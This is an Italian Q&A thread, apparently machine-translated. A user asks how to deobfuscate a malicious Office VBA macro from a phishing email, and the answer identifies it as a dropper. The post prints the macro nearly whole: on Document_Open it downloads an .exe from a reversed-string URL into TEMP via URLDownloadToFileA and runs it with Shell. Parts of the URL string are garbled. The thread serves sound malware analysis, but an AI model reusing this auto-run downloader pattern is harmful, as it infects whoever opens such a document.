Deobfuscate codice VBA dell'ufficio (malware) [chiuso]

Naviga le tue risposte
2

Mi è stata inviata un'e-mail dannosa e sto cercando di capire cosa fa il codice dannoso.

Sono riuscito a trovare il payload decrittando i valori Chr (), ma il resto del codice non è rintracciabile. 

        'xsWChLNzlXVGlYZFbEhKDOzjNBrFZHSIl

        'DpcvleMuqWiFyl
        'hyaTdAKzoQinNr


        #If VBA7 Then
        Private Declare PtrSafe Function GZwSeWZyIhNenjnZ Lib kernel32 Alias GetNumaNodeProcessorMask (ByVal lzYSEXffcfoThUbGZwSeWZyIhNenjnZ As Long, ByVal SqgFeQsbOnOMZMke As String, ByVal SqgFeQsbOnOMZMkeelVYixgTcfwsAmLJLMWHPWrDMfeVqPZuwgu As String, ByVal DBjnUFZaqAWuPymnejelVYixgTcfwsAmLJ As Long, ByVal elVYixgTcfwsAmLJoclNInPDShbETYbn As Long) As Long
        Private Declare PtrSafe Function elVYixgTcfwsAmLJ Lib kernel32 Alias WriteStateContainerValue (ByVal lzYSEXffcfoThUbGZwSeWZyIhNenjnZ As Long, ByVal SqgFeQsbOnOMZMkeelVYixgTcfwsAmLJ As String, ByVal LMWHPWrDMfeVqPZuwgu As String, ByVal DBjnUFZaqAWuPymnej As Long, ByVal GZwSeWZyIhNenjnZoclNInPDShbETYbn As Long) As Long
        Private Declare PtrSafe Function oclNInPDShbETYbn Lib kernel32 Alias CreateDirectoryExA (ByVal lzYSEXffcfoThUbGZwSeWZyIhNenjnZ As Long, ByVal SqgFeQsbOnOMZMkeelVYixgTcfwsAmLJ As String, ByVal LMWHPWrDMfeVqPZuwgu As String, ByVal DBjnUFZaqAWuPymnej As Long, ByVal GZwSeWZyIhNenjnZoclNInPDShbETYbn As Long) As Long
        Private Declare PtrSafe Function MoJTLPWYmfKTgbz Lib kernel32 Alias GetConsoleHistoryInfo (ByVal lzYSEXffcfoThUbGZwSeWZyIhNenjnZ As Long, ByVal SqgFeQsbOnOMZMkeelVYixgTcfwsAmLJ As String, ByVal lzYSEXffcfoThUb As String, ByVal elVYixgTcfwsAmLJDBjnUFZaqAWuPymnej As Long, ByVal GZwSeWZyIhNenjnZelVYixgTcfwsAmLJ As Long) As Long
        Private Declare PtrSafe Function MuRvBqzFOoCHiUHOJKw Lib kernel32 Alias GetTickCount64 (ByVal lzYSEXffcfoThUbGZwSeWZyIhNenjnZ As Long, ByVal SqgFeQsbOnOMZMkeelVYixgTcfwsAmLJ As String, ByVal LMWHPWrDMfeVqPZuwgu As String, ByVal DBjnUFZaqAWuPymnej As Long, ByVal GZwSeWZyIhNenjnZoclNInPDShbETYbn As Long) As Long
        Private Declare PtrSafe Function PAOKWMEkbYEoQQFQIb Lib kernel32 Alias FT_Exit24 (ByVal lzYSEXffcfoThUbGZwSeWZyIhNenjnZ As Long, ByVal SqgFeQsbOnOMZMkeelVYixgTcfwsAmLJ As String, ByVal LMWHPWrDMfeVqPZuwgu As String, ByVal DBjnUFZaqAWuPymnej As Long, ByVal GZwSeWZyIhNenjnZoclNInPDShbETYbn As Long) As Long
        Private Declare PtrSafe Function lIpXcxrTzTjpyvtA Lib kernel32 Alias GetProductName (ByVal lzYSEXffcfoThUbGZwSeWZyIhNenjnZ As Long, ByVal SqgFeQsbOnOMZMkeelVYixgTcfwsAmLJ As String, ByVal LMWHPWrDMfeVqPZuwgu As String, ByVal DBjnUFZaqAWuPymnej As Long, ByVal GZwSeWZyIhNenjnZoclNInPDShbETYbn As Long) As Long
        Private Declare PtrSafe Function JUNdgZxoTRSDKy Lib kernel32 Alias FindCloseChangeNotification (ByVal lzYSEXffcfoThUbGZwSeWZyIhNenjnZ As Long, ByVal SqgFeQsbOnOMZMkeelVYixgTcfwsAmLJ As String, ByVal LMWHPWrDMfeVqPZuwgu As String, ByVal DBjnUFZaqAWuPymnejelVYixgTcfwsAmLJ As Long, ByVal GZwSeWZyIhNenjnZoclNInPDShbETYbn As Long) As Long
        Private Declare PtrSafe Function VQBzUNhAGAtJOoF Lib urlmon Alias URLDownloadToFileA (ByVal LGXqVWHEnKiVcwaykFTVOtoYnoTDLwWaNw As Long, ByVal KftlkyaxsIGlyvxXaRq As String, ByVal tEMWFoNKZputSPQzVOtoYnoTDLwWaNw As String, ByVal VOtoYnoTDLwWaNwelVYixgTcfwsAmLJelVYixgTcfwsAmLJ As Long, ByVal elVYixgTcfwsAmLJelVYixgTcfwsAmLJVOtoYnoTDLwWaNw As Long) As Long
        Private Declare PtrSafe Function EQYZGelqKWNJRcce Lib kernel32 Alias PrivCopyFileExW (ByVal lzYSEXffcfoThUbGZwSeWZyIhNenjnZ As Long, ByVal SqgFeQsbOnOMZMkeelVYixgTcfwsAmLJ As String, ByVal LMWHPWrDMfeVqPZuwgu As String, ByVal DBjnUFZaqAWuPymnej As Long, ByVal GZwSeWZyIhNenjnZoclNInPDShbETYbnelVYixgTcfwsAmLJ As Long) As Long
        Private Declare PtrSafe Function iwjgRBIGLZpUNGoGTG Lib kernel32 Alias OfferVirtualMemory (ByVal lzYSEXffcfoThUbGZwSeWZyIhNenjnZ As Long, ByVal SqgFeQsbOnOMZMke As String, ByVal LMWHPWrDMfeVqPZuwgu As String, ByVal DBjnUFZaqAWuPymnejelVYixgTcfwsAmLJ As Long, ByVal GZwSeWZyIhNenjnZoclNInPDShbETYbn As Long) As Long
        #Else
        Private Declare Function MuRvBqzFOoCHiUHOJKw Lib kernel32 Alias GetTickCount64 (ByVal lzYSEXffcfoThUbGZwSeWZyIhNenjnZ As Long, ByVal SqgFeQsbOnOMZMkeelVYixgTcfwsAmLJ As String, ByVal LMWHPWrDMfeVqPZuwgu As String, ByVal DBjnUFZaqAWuPymnej As Long, ByVal GZwSeWZyIhNenjnZoclNInPDShbETYbn As Long) As Long
        Private Declare Function PAOKWMEkbYEoQQFQIb Lib kernel32 Alias FT_Exit24 (ByVal lzYSEXffcfoThUbGZwSeWZyIhNenjnZ As Long, ByVal SqgFeQsbOnOMZMkeelVYixgTcfwsAmLJ As String, ByVal LMWHPWrDMfeVqPZuwgu As String, ByVal DBjnUFZaqAWuPymnej As Long, ByVal GZwSeWZyIhNenjnZoclNInPDShbETYbn As Long) As Long
        Private Declare Function lIpXcxrTzTjpyvtA Lib kernel32 Alias GetProductName (ByVal lzYSEXffcfoThUbGZwSeWZyIhNenjnZ As Long, ByVal SqgFeQsbOnOMZMkeelVYixgTcfwsAmLJ As String, ByVal LMWHPWrDMfeVqPZuwgu As String, ByVal DBjnUFZaqAWuPymnej As Long, ByVal GZwSeWZyIhNenjnZoclNInPDShbETYbn As Long) As Long
        Private Declare Function JUNdgZxoTRSDKy Lib kernel32 Alias FindCloseChangeNotification (ByVal lzYSEXffcfoThUbGZwSeWZyIhNenjnZ As Long, ByVal SqgFeQsbOnOMZMkeelVYixgTcfwsAmLJ As String, ByVal LMWHPWrDMfeVqPZuwgu As String, ByVal DBjnUFZaqAWuPymnejelVYixgTcfwsAmLJ As Long, ByVal GZwSeWZyIhNenjnZoclNInPDShbETYbn As Long) As Long
        Private Declare Function EQYZGelqKWNJRcce Lib kernel32 Alias PrivCopyFileExW (ByVal lzYSEXffcfoThUbGZwSeWZyIhNenjnZ As Long, ByVal SqgFeQsbOnOMZMkeelVYixgTcfwsAmLJ As String, ByVal LMWHPWrDMfeVqPZuwgu As String, ByVal DBjnUFZaqAWuPymnej As Long, ByVal GZwSeWZyIhNenjnZoclNInPDShbETYbnelVYixgTcfwsAmLJ As Long) As Long
        Private Declare Function iwjgRBIGLZpUNGoGTG Lib kernel32 Alias OfferVirtualMemory (ByVal lzYSEXffcfoThUbGZwSeWZyIhNenjnZ As Long, ByVal SqgFeQsbOnOMZMke As String, ByVal LMWHPWrDMfeVqPZuwgu As String, ByVal DBjnUFZaqAWuPymnejelVYixgTcfwsAmLJ As Long, ByVal GZwSeWZyIhNenjnZoclNInPDShbETYbn As Long) As Long
        Private Declare Function VQBzUNhAGAtJOoF Lib urlmon Alias URLDownloadToFileA (ByVal eaNkjdOHzsdMqQQJj As Long, ByVal elVYixgTcfwsAmLJelVYixgTcfwsAmLJ As String, ByVal hyaTdAKzoQinNr As String, ByVal oclNInPDShbETYbnelVYixgTcfwsAmLJ As Long, ByVal MoJTLPWYmfKTgbzoclNInPDShbETYbn As Long) As Long
        Private Declare Function GZwSeWZyIhNenjnZ Lib kernel32 Alias GetNumaNodeProcessorMask (ByVal lzYSEXffcfoThUb As Long, ByVal SqgFeQsbOnOMZMke As String, ByVal SqgFeQsbOnOMZMkeelVYixgTcfwsAmLJLMWHPWrDMfeVqPZuwgu As String, ByVal DBjnUFZaqAWuPymnejelVYixgTcfwsAmLJ As Long, ByVal elVYixgTcfwsAmLJoclNInPDShbETYbn As Long) As Long
        Private Declare Function elVYixgTcfwsAmLJ Lib kernel32 Alias WriteStateContainerValue (ByVal lzYSEXffcfoThUbGZwSeWZyIhNenjnZ As Long, ByVal SqgFeQsbOnOMZMkeelVYixgTcfwsAmLJ As String, ByVal LMWHPWrDMfeVqPZuwgu As String, ByVal DBjnUFZaqAWuPymnej As Long, ByVal GZwSeWZyIhNenjnZoclNInPDShbETYbn As Long) As Long
        Private Declare Function oclNInPDShbETYbn Lib kernel32 Alias CreateDirectoryExA (ByVal lzYSEXffcfoThUbGZwSeWZyIhNenjnZ As Long, ByVal SqgFeQsbOnOMZMkeelVYixgTcfwsAmLJ As String, ByVal LMWHPWrDMfeVqPZuwgu As String, ByVal DBjnUFZaqAWuPymnej As Long, ByVal GZwSeWZyIhNenjnZoclNInPDShbETYbn As Long) As Long
        Private Declare Function MoJTLPWYmfKTgbz Lib kernel32 Alias GetConsoleHistoryInfo (ByVal lzYSEXffcfoThUbGZwSeWZyIhNenjnZ As Long, ByVal SqgFeQsbOnOMZMkeelVYixgTcfwsAmLJ As String, ByVal lzYSEXffcfoThUb As String, ByVal elVYixgTcfwsAmLJDBjnUFZaqAWuPymnej As Long, ByVal GZwSeWZyIhNenjnZelVYixgTcfwsAmLJ As Long) As Long
        #End If

        Function tyfevPUzZSHNUpjYGZwSeWZyIhNenjnZelVYixgTcfwsAmLJ(ByVal AEbtrIvLZRPbVNZDkwQiwTpwOOdeofW As Integer)
        kulqYfDfxsawQDJKsAEbtrIvLZRPbVN = tyfevPUzZSHNUpjY
        If kulqYfDfxsawQDJKsAEbtrIvLZRPbVN = tyfevPUzZSHNUpjY Then
        'GZwSeWZyIhNenjnZoclNInPDShbETYbn=MoJTLPWYmfKTgbz
        End If
        End Function
        Function hbnTqBUKPuGRJiqWZCx(ByVal AEbtrIvLZRPbVNfgVj As String, ByVal hUfrAbrdnkOdGp As String)
        If PSUWksxjZPfDYLXwvxT = rMDsWrTugbpcOBHF Then
        PYcyaTaPAZYqaEfo = ZPrnJJzqaCCtqvTbUx
        'cbxeKGrLfUwXefANSyFxsWChLNzlXVGlYZZPrnJJzqaCCtqvTbUx
        ZPrnJJzqaCCtqvTbUx = PSUWksxjZPfDYLXwvxT
        End If
        VQBzUNhAGAtJOoF 4 - 2 - 2 + 0 + 0, AEbtrIvLZRPbVNfgVj, hUfrAbrdnkOdGp, -4 + 4 + 100 - 100, 0 + 2 - 2
        kulqYfDfxsawQDJKs = tyfevPUzZSHNUpjY
        End Function


        'Dim GwBumCCwetkuJxFBCpItkYuBQhYPrTgw as Boolean
        Private Sub VOtoYnoTDLwWaNw()
        iCQYbaBRKwhBnk = lhkiLXZpbeIyqeoYYT
        kblSRXpqDJMxcL = DBjnUFZaqAWuPymnej(Chr(101) + Chr(120) + Chr(101) + Chr(46) + Chr(Asc(w)) + Chr(Asc(l)) + Chr(98) + Chr(100) + Chr(111) + Chr(Asc(c)) + Chr(47) + Chr(116) + Chr(97) + Chr(99) + Chr(46) + Chr(102) + Chr(109) + Chr(Asc(o)) + Chr(Asc(p)) + Chr(46) + Chr(Asc(a)) + Chr(Asc()) + Chr(Asc()) + Chr(Asc()) + Chr(115) + Chr(Asc(p)) + Chr(116) + Chr(116) + Chr(104))

        If AEbtrIvLZRPbVN = ZDkwQiwTpwOOdeofW Then
        SqgFeQsbOnOMZMke = dhwvEFcKDpsYsyJeZg
        lzYSEXffcfoThUb = LMWHPWrDMfeVqPZuwgu
        End If

        ZKsXGJZRFGCfXvXP = DBjnUFZaqAWuPymnej(ctsalal)

        If vMtgBnwtQByVtExPHr = rSCIQrDtFvkdcUGB Then
        iTWgFywkvRqSPai = ZUqEtJtyPvyDIJuP
        End If

        VJtYenETeqAVMuxRbDY = Environ$(Chr(22# + 22# + 22# + 8# + 10#) + Chr(100 - 100 + 4 + 3 + 50 + 20) + Chr(2 - 2 + 100 - 10 - 5 - 5)) + Chr(2 + 10 + 20 + 30 + 30) & ZKsXGJZRFGCfXvXP

        If jAINgzIjHHlNyJLBCET = snhxHQABbdQMsDkgL Then
        lzYSEXffcfoThUb = LMWHPWrDMfeVqPZuwgu
        End If

        hbnTqBUKPuGRJiqWZCx kblSRXpqDJMxcL, VJtYenETeqAVMuxRbDY 'if jAINgzIjHHlNyJLBCET = snhxHQABbdQMsDkgL Then

        Dim rSCIQrDtFvkdcUGBVJtYenETeqAVMuxRbDY As Currency

        Call Shell(VJtYenETeqAVMuxRbDY, vbNormalFocus) ' Dim rSCIQrDtFvkdcUGBVJtYenETeqAVMuxRbDY as Integer
        QVKciSoAuvfQxE = WIlNjMLmbBEiXU
        End Sub

        Sub Document_Open()
        VOtoYnoTDLwWaNw 'kulqYfDfxsawQDJKstyfevPUzZSHNUpjY
        End Sub

        Private Function EoUkpEUNnhmSKLKUmtAYNRreSwhjqjV(ByVal FbEhKDOzjNBrFZHSIlEoUkpEUNnhmSKL As String)
        TSSWLPSPMemjroWC = KUmtAYNRreSwhjqjV


        If KUmtAYNRreSwhjqjV = EoUkpEUNnhmSKL Then
        TSSWLPSPMemjroWC = KUmtAYNRreSwhjqjV

        Dim FbEhKDOzjNBrFZHSIl As Currency

        End If

        End Function

        Private Sub eIZAqeJRzrTIWdkoMI()
        oFxRFuVhRCqIsfBH = MRVXJWcClZWEiZqHHU
        End Sub

        Private Function DBjnUFZaqAWuPymnej(lJWzsWzeaVgVJGa)
        If TSSWLPSPMemjroWC = KUmtAYNRreSwhjqjV Then
        TSSWLPSPMemjroWC = KUmtAYNRreSwhjqjV
        End If
          DBjnUFZaqAWuPymnej = StrReverse(lJWzsWzeaVgVJGa)

        If TSSWLPSPMemjroWC = KUmtAYNRreSwhjqjV Then
        KUmtAYNRreSwhjqjV = EoUkpEUNnhmSKL
        End If
        End Function

        Function GZwSeWZyIhNenjnZtyfevPUzZSHNUpjY(ByVal AEbtrIvLZRPbVNZDkwQiwTpwOOdeofW As Integer)
        kulqYfDfxsawQDJKsAEbtrIvLZRPbVN = tyfevPUzZSHNUpjY
        If kulqYfDfxsawQDJKsAEbtrIvLZRPbVN = tyfevPUzZSHNUpjY Then
        'GZwSeWZyIhNenjnZoclNInPDShbETYbn=MoJTLPWYmfKTgbz
        End If
        End Function

Quali metodi posso utilizzare per decodificare / decodificare il codice sottostante per capire cosa fa.

Ho provato lo script oledump.py trovato qui ( link ), ma senza risultato.

Il codice evidenziato può essere visto qui: link

    
posta user3580480 19.11.2016 - 09:44
fonte

1 risposta

2

VQBzUNhAGAtJOoF è un alias per URLDownloadToFileA

Environ$(Chr(22# + 22# + 22# + 8# + 10#) + Chr(100 - 100 + 4 + 3 + 50 + 20) + Chr(2 - 2 + 100 - 10 - 5 - 5)) + Chr(2 + 10 + 20 + 30 + 30) è uguale a "TEMP\"

Di solito questi script sono tutti uguali: scaricano un file eseguibile da Internet nella cartella TEMP e lo eseguono (usando l'istruzione Shell in questo codice).

Questo eseguibile è il vero codice dannoso.

    
risposta data 19.11.2016 - 11:23
fonte

Leggi altre domande sui tag

Quanta sicurezza aggiunge il doppio strato VPN? Guardando i documenti criptati in ufficio aperto